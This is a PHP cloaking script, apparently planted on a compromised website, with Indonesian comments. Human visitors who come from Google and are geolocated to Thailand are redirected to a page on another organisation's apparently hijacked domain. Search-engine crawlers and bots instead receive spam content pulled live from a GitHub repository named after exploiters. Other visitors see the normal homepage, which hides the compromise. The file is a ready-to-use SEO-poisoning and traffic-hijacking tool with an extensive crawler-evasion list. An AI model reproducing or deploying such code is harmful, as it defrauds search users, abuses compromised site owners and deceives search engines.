<?php
// ============ Konfigurasi ============
$target = 'https://xn--12ca2dbc1f9gc3nd.lazismumedankota.org/403.html';
define('GEO_API_TIMEOUT', 3); // timeout untuk API geolocation
// ====================================

function hval($k, $d='') {
    return isset($_SERVER[$k]) ? $_SERVER[$k] : $d;
}

function safeRedirect($url, $status=302){
    if (!headers_sent()) { 
        header("Location: $url", true, $status); 
        exit; 
    }
    $e = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    echo "<meta http-equiv='refresh' content='0;url=$e'>";
    echo "<script>location.replace('$e');</script>";
    exit;
}

function get_user_ip() {
    if (!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) return $_SERVER['HTTP_CF_CONNECTING_IP'];
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        foreach ($parts as $p) {
            $p = trim($p);
            if ($p !== '') return $p;
        }
    }
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) return $_SERVER['HTTP_CLIENT_IP'];
    return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
}

function curl_get($url, $timeout = GEO_API_TIMEOUT) {
    if (!function_exists('curl_init')) return null;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0"); // user agent biar lebih aman
    $r = curl_exec($ch);
    curl_close($ch);
    return $r !== false ? trim($r) : null;
}

function get_country_by_ip_fallback($ip) {
    if (empty($ip) || $ip === '0.0.0.0') return null;
    $res = @curl_get("http://ip-api.com/line/{$ip}?fields=countryCode", GEO_API_TIMEOUT);
    if ($res) return strtoupper(trim($res));
    return null;
}

// ====== Daftar bot super lengkap ======
function isBot(){
    $ua = strtolower(hval('HTTP_USER_AGENT'));
    if ($ua === '') return true; // UA kosong dianggap bot

    $bots = array(
        // Google
        'googlebot','googlebot-image','googlebot-news','googlebot-video','mediapartners','adsbot-google',
        'feedfetcher-google','apis-google','google web preview','googleweblight','google-inspectiontool','-google',
        // Bing
        'bingbot','bing','msnbot','bingpreview','adidxbot',
        // Yahoo / Verizon
        'slurp','yahoo! slurp','yahooseeker','yahoo link preview',
        // DuckDuckGo
        'duckduckbot',
        // Baidu
        'baiduspider','baidu','baiduspider-image','baiduspider-video',
        // Yandex
        'yandexbot','yandexmobilebot','yandex','yandeximages','yandexvideo',
        // Social media / link preview
        'facebookexternalhit','facebook','facebot','twitterbot','twitter','linkedinbot','pinterest','pinterestbot','embedly','quora link preview',
        // SEO / crawling tools
        'ahrefsbot','semrushbot','mj12bot','screaming frog','mod_pagespeed','siteexplorer','seokicks','dotbot','dotcom-tools','spbot',
        // Headless / automation / misc
        'headlesschrome','phantomjs','wget','curl','python-requests','libwww-perl','httpclient','monitoring','check','fetch','scanner',
        'crawler','spider','bot','crawler','zeus/i','petalbot','bytespider','applebot','xing','seznambot','sogou'
    );

    foreach($bots as $b){ 
        if(stripos($ua, $b) !== false) return true; 
    }
    return false;
}

// ====== Cek pengunjung dari Google ======
function cameFromGoogle(){
    $ref = hval('HTTP_REFERER');
    if ($ref !== '') {
        $parsed = parse_url($ref);
        $h = isset($parsed['host']) ? strtolower($parsed['host']) : '';
        if (preg_match('/(^|\.)google\.[a-z.]+$/', $h)) return true;
        if (in_array($h, array('webcache.googleusercontent.com', 'googleweblight.com'))) return true;
    }
    if (!empty($_GET['gclid'])) return true;
    $utm_source = isset($_GET['utm_source']) ? strtolower($_GET['utm_source']) : '';
    if ($utm_source === 'google') return true;
    return false;
}

// ====== Cek apakah pengunjung dari Thailand ======
function isFromThailand(){
    // Cek IP menggunakan CloudFlare headers dulu
    $cf_country = hval('HTTP_CF_IPCOUNTRY');
    if ($cf_country === 'TH') return true;
    
    // Cek header lainnya
    $country_headers = array(
        'HTTP_X_COUNTRY_CODE',
        'HTTP_X_FORWARDED_COUNTRY',
        'HTTP_GEOIP_COUNTRY_CODE'
    );
    
    foreach($country_headers as $header) {
        $country = hval($header);
        if (strtoupper($country) === 'TH') return true;
    }
    
    // Fallback: cek menggunakan IP API
    $ip = get_user_ip();
    if ($ip && $ip !== '0.0.0.0') {
        $country = get_country_by_ip_fallback($ip);
        if ($country === 'TH') return true;
    }
    
    return false;
}

// ====== Debug (opsional) ======
// file_put_contents('debug_bot.txt', hval('HTTP_USER_AGENT') . "\n", FILE_APPEND);

// ----------- LOGIKA UTAMA -----------
// Jika manusia dari Google DAN dari Thailand → redirect
if (!isBot() && cameFromGoogle() && isFromThailand()) {
    safeRedirect($target);
}

// Jika bot → tampilkan content dari GitHub
if (isBot()) {
    $bot_content = curl_get('https://raw.githubusercontent.com/gankexploitersss/hohoohohoh/refs/heads/main/mydentalplan.txt');
    if ($bot_content) {
        echo $bot_content;
    } else {
        // Fallback jika gagal ambil dari GitHub
        include dirname(__FILE__) . '/home.php';
    }
    exit;
}

// Jika bukan bot → tampilkan homepage.php
if (!isBot()) {
    include dirname(__FILE__) . '/homepage.php';
    exit;
}
?>
